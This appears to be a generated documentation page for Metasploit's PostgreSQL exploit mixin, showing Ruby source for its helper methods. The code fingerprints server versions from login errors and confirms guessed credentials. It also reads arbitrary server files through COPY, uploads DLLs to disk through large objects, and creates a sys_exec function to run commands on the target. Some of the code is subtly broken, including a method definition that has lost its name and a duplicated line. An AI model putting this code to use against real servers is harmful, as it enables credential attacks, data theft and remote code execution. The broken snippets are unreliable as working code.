Module: Msf::Exploit::Remote::Postgres

Includes:
Db::PostgresPR
Defined in:
lib/msf/core/exploit/postgres.rb

Overview

This module exposes methods for querying a remote PostgreSQL service.

Instance Attribute Summary collapse

Datastore accessors collapse

Instance Method Summary collapse

Instance Attribute Details

#postgres_conn::Msf::Db::PostgresPR::Connection

Returns:

  • (::Msf::Db::PostgresPR::Connection)

20
21
22
# File 'lib/msf/core/exploit/postgres.rb', line 20

def postgres_conn
  @postgres_conn
end

Instance Method Details

#analyze_auth_error(e) ⇒ Hash

Matches up filename, line number, and routine with a version. These all come from source builds of Postgres. TODO: check in on the binary distros, see if they're different.

Parameters:

  • e (RuntimeError)

    The exception raised by Connection.new

Returns:

  • (Hash)

    A hash containing the version in one of the keys :preauth, :auth, or :unknown, depending on how it was determined

See Also:


258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
# File 'lib/msf/core/exploit/postgres.rb', line 258

def analyze_auth_error(e)
  fname,fline,froutine = e.to_s.split("\t")[3,3]
  fingerprint = "#{fname}:#{fline}:#{froutine}"
  case fingerprint

  # Usually, Postgres is on Linux, so let's use that as a baseline.

  when "Fauth.c:L395:Rauth_failed"          ; return {:preauth => "7.4.26-27"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L264:RInitPostgres"     ; return {:preauth => "7.4.26-27"} # Failed (bad db, good credentials)
  when "Fauth.c:L452:RClientAuthentication" ; return {:preauth => "7.4.26-27"} # Rejected (maybe good, but not allowed due to pg_hba.conf)

  when "Fauth.c:L400:Rauth_failed"          ; return {:preauth => "8.0.22-23"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L274:RInitPostgres"     ; return {:preauth => "8.0.22-23"} # Failed (bad db, good credentials)
  when "Fauth.c:L457:RClientAuthentication" ; return {:preauth => "8.0.22-23"} # Rejected (maybe good)

  when "Fauth.c:L337:Rauth_failed"          ; return {:preauth => "8.1.18-19"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L354:RInitPostgres"     ; return {:preauth => "8.1.18-19"} # Failed (bad db, good credentials)
  when "Fauth.c:L394:RClientAuthentication" ; return {:preauth => "8.1.18-19"} # Rejected (maybe good)

  when "Fauth.c:L414:RClientAuthentication" ; return {:preauth => "8.2.7-1"}   # Failed (bad db, bad credentials) ubuntu 8.04.2
  when "Fauth.c:L362:Rauth_failed"          ; return {:preauth => "8.2.14-15"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L319:RInitPostgres"     ; return {:preauth => "8.2.14-15"} # Failed (bad db, good credentials)
  when "Fauth.c:L419:RClientAuthentication" ; return {:preauth => "8.2.14-15"} # Rejected (maybe good)

  when "Fauth.c:L1003:Rauth_failed"          ; return {:preauth => "8.3.8"}    # Failed (bad db, bad credentials)
  when "Fpostinit.c:L388:RInitPostgres"      ; return {:preauth => "8.3.8-9"}  # Failed (bad db, good credentials)
  when "Fauth.c:L1060:RClientAuthentication" ; return {:preauth => "8.3.8"}    # Rejected (maybe good)

  when "Fauth.c:L1017:Rauth_failed"          ; return {:preauth => "8.3.9"} # Failed (bad db, bad credentials)
  when "Fauth.c:L1074:RClientAuthentication" ; return {:preauth => "8.3.9"} # Rejected (maybe good, but not allowed due to pg_hba.conf)

  when "Fauth.c:L258:Rauth_failed"          ; return {:preauth => "8.4.1"}   # Failed (bad db, bad credentials)
  when "Fpostinit.c:L422:RInitPostgres"     ; return {:preauth => "8.4.1-2"} # Failed (bad db, good credentials)
  when "Fauth.c:L349:RClientAuthentication" ; return {:preauth => "8.4.1"}   # Rejected (maybe good)

  when "Fauth.c:L273:Rauth_failed"          ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials)
  when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good)

  when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials)
  when "Fpostinit.c:L709:RInitPostgres"     ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials)

  when "Fauth.c:L302:Rauth_failed"          ; return {:preauth => "9.1.6"} # Bad password, good database
  when "Fpostinit.c:L718:RInitPostgres"     ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
  when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
  when "Fmiscinit.c:L362:RInitializeSessionUserId" ; return {:preauth => "9.4.1-5"} # Bad user
  when "Fauth.c:L285:Rauth_failed"          ; return {:preauth => "9.4.1-5"} # Bad creds, good database
  when "Fpostinit.c:L794:RInitPostgres"     ; return {:preauth => "9.4.1-5"} # Good creds, non-existent but allowed database
  when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host

  # Windows

  when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed'               ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials)
  when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres'     ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials)
  when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication'      ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good)

  when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication'      ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf)
  when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed'               ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds)

  when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed'                 ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds)
  when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres'       ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials)
  when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication'        ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf)

  # OpenSolaris (thanks Alexander!)

  when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials)
  when 'Fmiscinit.c:L382:' ; return {:preauth => '8.2.4-OpenSolaris'} # Failed (good db, bad credentials)
  when 'Fpostinit.c:L318:' ; return {:preauth => '8.2.4-8.2.9-OpenSolaris'} # Failed (bad db, bad credentials)
  when 'Fpostinit.c:L319:' ; return {:preauth => '8.2.10-8.2.13-OpenSolaris'} # Failed (bad db, bad credentials)

  else
    return {:unknown => fingerprint}
  end
end

#databaseString

Return the datastore value of the same name

Returns:

  • (String)

    Database to connect to when authenticating


61
# File 'lib/msf/core/exploit/postgres.rb', line 61

def database; datastore['DATABASE']; end

#initialize(info = {}) ⇒ Object

Creates an instance of a PostgreSQL exploit module.


25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# File 'lib/msf/core/exploit/postgres.rb', line 25

def initialize(info = {})
  super

  # Register the options that all Postgres exploits may make use of.
  register_options(
    [
      Opt::RHOST,
      Opt::RPORT(5432),
      OptString.new('DATABASE', [ true, 'The database to authenticate against', 'template1']),
      OptString.new('USERNAME', [ true, 'The username to authenticate as', 'postgres']),
      OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', 'postgres']),
      OptBool.new('VERBOSE', [false, 'Enable verbose output', false]),
      OptString.new('SQL', [ false, 'The SQL query to execute',  'select version()']),
      OptBool.new('RETURN_ROWSET', [false, "Set to true to see query result sets", true])
    ], Msf::Exploit::Remote::Postgres)

  register_autofilter_ports([ 5432 ])
  register_autofilter_services(%W{ postgres })
end

#passwordString

Return the datastore value of the same name

Returns:

  • (String)

    Password for authentication


58
# File 'lib/msf/core/exploit/postgres.rb', line 58

def password; datastore['PASSWORD']; end

#postgres_authed_fingerprintHash

Ask the server what its version is

Returns:

  • (Hash)

    A hash containing the version in one of the keys :preauth, :auth, or :unknown, depending on how it was determined

See Also:


245
246
247
248
249
# File 'lib/msf/core/exploit/postgres.rb', line 245

def postgres_authed_fingerprint
  resp = postgres_query("select version()",false)
  ver = resp[:complete].rows[0][0]
  return {:auth => ver}
end

#postgres_base64_data(data) ⇒ String

Converts data to base64 with no newlines

Parameters:

  • data (String)

    Raw data to be base64'd

Returns:

  • (String)

    A base64 string suitable for passing to postgresql's decode(..., 'base64') function


490
491
492
# File 'lib/msf/core/exploit/postgres.rb', line 490

def postgres_base64_data(data)
  [data].pack("m*").gsub(/\r?\n/,"")
end

#postgres_base64_file(fname) ⇒ String

Calls #postgres_base64_data with the contents of file fname

Parameters:

  • fname (String)

    Name of a file on the local system

Returns:

  • (String)

    A base64 string suitable for passing to postgresql's decode(..., 'base64') function


480
481
482
483
# File 'lib/msf/core/exploit/postgres.rb', line 480

def postgres_base64_file(fname)
  data = File.open(fname, "rb") {|f| f.read f.stat.size}
  postgres_base64_data(data)
end

#postgres_create_stager_tableObject

Deprecated.

No longer necessary since we can insert base64 data directly

Creates a temporary table to store base64'ed binary data in.


498
499
500
501
502
503
504
505
506
507
# File 'lib/msf/core/exploit/postgres.rb', line 498

def postgres_create_stager_table
  tbl = Rex::Text.rand_text_alpha(8).downcase
  fld = Rex::Text.rand_text_alpha(8).downcase
  resp = postgres_query("create temporary table #{tbl}(#{fld} text)")
  if resp[:sql_error]
    print_error resp[:sql_error]
    return false
  end
  return [tbl,fld]
end

#postgres_create_sys_exec(dll) ⇒ Object

Deprecated.

Just get a real shell instead

Creates the function sys_exec() in the pg_temp schema.


372
373
374
375
376
377
378
379
380
# File 'lib/msf/core/exploit/postgres.rb', line 372

def postgres_create_sys_exec(dll)
  q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable"
  resp = postgres_query(q);
  if resp[:sql_error]
    print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
    return false
  end
  return true
end

#postgres_fingerprint(args = {}) ⇒ Hash

Attempts to fingerprint a remote PostgreSQL instance, inferring version number from the failed authentication messages or simply returning the result of “select version()” if authentication was successful.

Returns:

  • (Hash)

    A hash containing the version in one of the keys :preauth, :auth, or :unknown, depending on how it was determined

See Also:


217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
# File 'lib/msf/core/exploit/postgres.rb', line 217

def postgres_fingerprint(args={})
  return postgres_authed_fingerprint if self.postgres_conn
  db = args[:database]       || datastore['DATABASE']
  username = args[:username] || datastore['USERNAME']
  password = args[:password] || datastore['PASSWORD']
  rhost = args[:server]      || datastore['RHOST']
  rport = args[:port]        || datastore['RPORT']

  uri = "tcp://#{rhost}:#{rport}"
  if Rex::Socket.is_ipv6?(rhost)
    uri = "tcp://[#{rhost}]:#{rport}"
  end

  verbose = args[:verbose]   || datastore['VERBOSE']
  begin
    self.postgres_conn = Connection.new(db,username,password,uri)
  rescue RuntimeError => e
    vprint_error e.to_s
    version_hash = analyze_auth_error e
    return version_hash
  end
  return postgres_authed_fingerprint if self.postgres_conn
end

#postgres_has_database_privilege(priv) ⇒ Boolean

Returns Whether the current user has privilege priv on the current database.

Returns:

  • (Boolean)

    Whether the current user has privilege priv on the current database


360
361
362
363
364
365
366
367
368
# File 'lib/msf/core/exploit/postgres.rb', line 360

def postgres_has_database_privilege(priv)
  sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')}
  ret = postgres_query(sql,false)
  if ret.keys[0] == :complete
    ret.values[0].rows[0][0].inspect =~ /t/i ? true : false
  else
    return false
  end
end

#postgres_login(opts = {}) ⇒ :error_database, ...

Note:

This method will first call #postgres_logout if the module is already connected.

Takes a number of arguments (defaults to the datastore for appropriate values), and will either populate #postgres_conn and return :connected, or will return :error, :error_databse, or :error_credentials in case of an error.

Fun fact: if you get :error_database, it means your username and password was accepted (you just failed to guess a correct running database instance).

Parameters:

  • opts (Hash) (defaults to: {})

    Options for authenticating

Options Hash (opts):

  • :database (String)

    The database

  • :username (String)

    The username

  • :username (String)

    The username

  • :server (String)

    IP address or hostname of the target server

  • :port (Integer)

    TCP port on :server

Returns:

  • (:error_database)

    if user/pass are correct but database is wrong

  • (:error_credentials)

    if user/pass are wrong

  • (:error)

    if some other error occurred

  • (:connected)

    if everything went as planned


91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
# File 'lib/msf/core/exploit/postgres.rb', line 91

def (opts={})
  postgres_logout if self.postgres_conn
  db = opts[:database]       || datastore['DATABASE']
  username = opts[:username] || datastore['USERNAME']
  password = opts[:password] || datastore['PASSWORD']
  ip = opts[:server]         || datastore['RHOST']
  port = opts[:port]         || datastore['RPORT']
  uri = "tcp://#{ip}:#{port}"

  if Rex::Socket.is_ipv6?(ip)
    uri = "tcp://[#{ip}]:#{port}"
  end

  verbose = opts[:verbose]   || datastore['VERBOSE']
  begin
    self.postgres_conn = Connection.new(db,username,password,uri)
  rescue RuntimeError => e
    case e.to_s.split("\t")[1]
    when "C3D000"
      print_status "#{ip}:#{port} Postgres - Invalid database: #{db} (Credentials '#{username}:#{password}' are OK)" if verbose
      return :error_database # Note this means the user:pass is good!
    when "C28000", "C28P01"
      print_error "#{ip}:#{port} Postgres - Invalid username or password: '#{username}':'#{password}'" if verbose
      return :error_credentials
    else
      print_error "#{ip}:#{port} Postgres - Error: #{e.inspect}" if verbose
      return :error
    end
  end
  if self.postgres_conn
    print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
    return :connected
  end
end

#postgres_logoutvoid

This method returns an undefined value.

Logs out of a database instance and sets #postgres_conn to nil


129
130
131
132
133
134
135
136
137
138
# File 'lib/msf/core/exploit/postgres.rb', line 129

def postgres_logout
  ip = datastore['RHOST']
  port = datastore['RPORT']
  verbose = datastore['VERBOSE']
  if self.postgres_conn
    self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn"))
    self.postgres_conn = nil
  end
  print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
end

#postgres_passwordString

Returns The password as provided by the user or a random one if none has been given.

Returns:

  • (String)

    The password as provided by the user or a random one if none has been given.


334
335
336
337
338
339
340
# File 'lib/msf/core/exploit/postgres.rb', line 334

def postgres_password
  if datastore['PASSWORD'].to_s.size > 0
    datastore['PASSWORD'].to_s
  else
    'INVALID_' + Rex::Text.rand_text_alpha(rand(6) + 1)
  end
end

#postgres_print_reply(resp = nil, sql = nil) ⇒ Object

If resp is not actually a Connection::Result object, then return :error (but not an actual Exception, that's up to the caller. Otherwise, create a rowset using Rex::Text::Table (if there's more than 0 rows) and return :complete.


189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
# File 'lib/msf/core/exploit/postgres.rb', line 189

def postgres_print_reply(resp=nil,sql=nil)
  ip = datastore['RHOST']
  port = datastore['RPORT']
  verbose = datastore['VERBOSE']
  return :error unless resp.kind_of? Connection::Result
  if resp.rows and resp.fields
    print_status "#{ip}:#{port} Rows Returned: #{resp.rows.size}" if verbose
    if resp.rows.size > 0
      tbl = Rex::Text::Table.new(
        'Indent' => 4,
        'Header' => "Query Text: '#{sql}'",
        'Columns' => resp.fields.map {|x| x.name}
      )
      resp.rows.each {|row| tbl << row.map { |x| x.nil? ? "NIL" : x } }
      print_line(tbl.to_s)
    end
  end
  return :complete
end

#postgres_query(sql = nil, doprint = false) ⇒ Hash

If not currently connected, attempt to connect. If an error is encountered while executing the query, it will return with :error ; otherwise, it will return with :complete.

Parameters:

  • sql (String) (defaults to: nil)

    The query to run

  • doprint (Boolean) (defaults to: false)

    Whether the result should be printed

Returns:

  • (Hash)

147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
# File 'lib/msf/core/exploit/postgres.rb', line 147

def postgres_query(sql=nil,doprint=false)
  ip = datastore['RHOST']
  port = datastore['RPORT']
   unless self.postgres_conn
  unless self.postgres_conn
    return {:conn_error => true}
  end
  if self.postgres_conn
    sql ||= datastore['SQL']
    vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
    begin
      resp = self.postgres_conn.query(sql)
    rescue RuntimeError => e
      case sql_error_msg = e.to_s.split("\t")[1] # Deal with some common errors
      when "C42601"
        sql_error_msg += " Invalid SQL Syntax: '#{sql}'"
      when "C42P01"
        sql_error_msg += " Table does not exist: '#{sql}'"
      when "C42703"
        sql_error_msg += " Column does not exist: '#{sql}'"
      when "C42883"
        sql_error_msg += " Function does not exist: '#{sql}'"
      else # Let the user figure out the rest.
        if e == Timeout::Error
          sql_error_msg = 'Execution expired'
        elsif sql_error_msg.nil?
          sql_error_msg = e.inspect
        else
          sql_error_msg += " SQL statement '#{sql}' returns #{e.inspect}"
        end
      end
      return {:sql_error => sql_error_msg}
    end
    postgres_print_reply(resp,sql) if doprint
    return {:complete => resp}
  end
end

#postgres_read_textfile(filename) ⇒ Object

This presumes the user has rights to both the file and to create a table. If not, #postgres_query will return an error (usually :sql_error), and it should be dealt with by the caller.


345
346
347
348
349
350
351
352
353
354
355
356
# File 'lib/msf/core/exploit/postgres.rb', line 345

def postgres_read_textfile(filename)
  # Check for temp table creation privs first.
  unless postgres_has_database_privilege('TEMP')
    return({:sql_error => "Insufficent privileges for #{datastore['USERNAME']} on #{datastore['DATABASE']}"})
  end

  temp_table_name = Rex::Text.rand_text_alpha(rand(10)+6)
  read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
    COPY #{temp_table_name} FROM '#{filename}';
    SELECT * FROM #{temp_table_name}}
  return postgres_query(read_query,true)
end

#postgres_sys_exec(cmd) ⇒ Object

Deprecated.

Just get a real shell instead

This presumes the pg_temp.sys_exec() udf has been installed, almost certainly by postgres_create_sys_exec()


386
387
388
389
390
391
392
393
394
395
# File 'lib/msf/core/exploit/postgres.rb', line 386

def postgres_sys_exec(cmd)
  print_status "Attempting to Execute: #{cmd}"
  q = "select pg_temp.sys_exec('#{cmd}')"
  resp = postgres_query(q)
  if resp[:sql_error]
    print_error resp[:sql_error]
    return false
  end
  return true
end

#postgres_upload_binary_data(data, remote_fname = nil) ⇒ nil, String

Writes data to disk on the target server.

This is accomplished in 5 steps:

  1. Create a new object with “select lo_create(-1)”

  2. Delete any resulting rows in pg_largeobject table. On 8.x and older, postgres inserts rows as a result of the call to lo_create. Deleting them here approximates the state on 9.x where no such insert happens.

  3. Break the data into LOBLOCKSIZE-byte chunks.

  4. Insert each of the chunks as a row in pg_largeobject

  5. Select lo_export to write the file to disk

Parameters:

  • data (String)

    Raw binary to write to disk

  • remote_fname (String) (defaults to: nil)

    Name of the file on the remote server where the data will be stored. Default is "<random>.dll"

Returns:

  • (nil)

    if any part of this process failed

  • (String)

    if everything went as planned, the name of the file we dropped. This is really only useful if remote_fname is nil


427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
# File 'lib/msf/core/exploit/postgres.rb', line 427

def postgres_upload_binary_data(data, remote_fname=nil)
  remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"

  # From the Postgres documentation:
  #   SELECT lo_creat(-1);       -- returns OID of new, empty large object
  # Doing it this way instead of calling lo_create with a random number
  # ensures that we don't accidentally hit the id of a real object.
  resp = postgres_query "select lo_creat(-1)"
  unless resp and resp[:complete] and resp[:complete].rows[0]
    print_error "Failed to get a new loid"
    return
  end

  oid = resp[:complete].rows[0][0].to_i

  queries = [ "delete from pg_largeobject where loid=#{oid}" ]

  # Break the data into smaller chunks that can fit in the size allowed in
  # the pg_largeobject data column.
  # From the postgres documentation:
  #   "The amount of data per page is defined to be LOBLKSIZE (which is
  #   currently BLCKSZ/4, or typically 2 kB)."
  # Empirically, it seems that 8kB is fine on 9.x, but we play it safe and
  # stick to 2kB.
  chunks = []
  while ((c = data.slice!(0..2047)) && c.length > 0)
    chunks.push c
  end

  chunks.each_with_index do |chunk, pageno|
    b64_data = postgres_base64_data(chunk)
    insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))"
    queries.push( "#{insert}"%[oid, pageno, b64_data] )
  end
  queries.push "select lo_export(#{oid}, '#{remote_fname}')"

  # Now run each of the queries we just built
  queries.each do |q|
    resp = postgres_query(q)
    if resp && resp[:sql_error]
      print_error "Could not write the library to disk."
      print_error resp[:sql_error]
      # Can't really recover from this, bail
      return nil
    end
  end
  return remote_fname
end

#postgres_upload_binary_file(fname, remote_fname = nil) ⇒ nil, String

Uploads the given local file to the remote server

Parameters:

  • fname (String)

    Name of a file on the local filesystem to be uploaded

  • remote_fname (String) (defaults to: nil)

    Name of the file on the remote server where the data will be stored. Default is "<random>.dll"

Returns:

  • (nil)

    if any part of this process failed

  • (String)

    if everything went as planned, the name of the file we dropped. This is really only useful if remote_fname is nil


404
405
406
407
# File 'lib/msf/core/exploit/postgres.rb', line 404

def postgres_upload_binary_file(fname, remote_fname=nil)
  data = File.read(fname)
  postgres_upload_binary_data(data, remote_fname)
end

#rhostString

Return the datastore value of the same name

Returns:

  • (String)

    IP address of the target


49
# File 'lib/msf/core/exploit/postgres.rb', line 49

def rhost; datastore['RHOST']; end

#rportInteger

Return the datastore value of the same name

Returns:

  • (Integer)

    TCP port where the target service is running


52
# File 'lib/msf/core/exploit/postgres.rb', line 52

def rport; datastore['RPORT']; end

#usernameString

Return the datastore value of the same name

Returns:

  • (String)

    Username for authentication


55
# File 'lib/msf/core/exploit/postgres.rb', line 55

def username; datastore['USERNAME']; end

#verboseBoolean

Return the datastore value of the same name

Returns:

  • (Boolean)

    Whether to print verbose output


64
# File 'lib/msf/core/exploit/postgres.rb', line 64

def verbose; datastore['VERBOSE']; end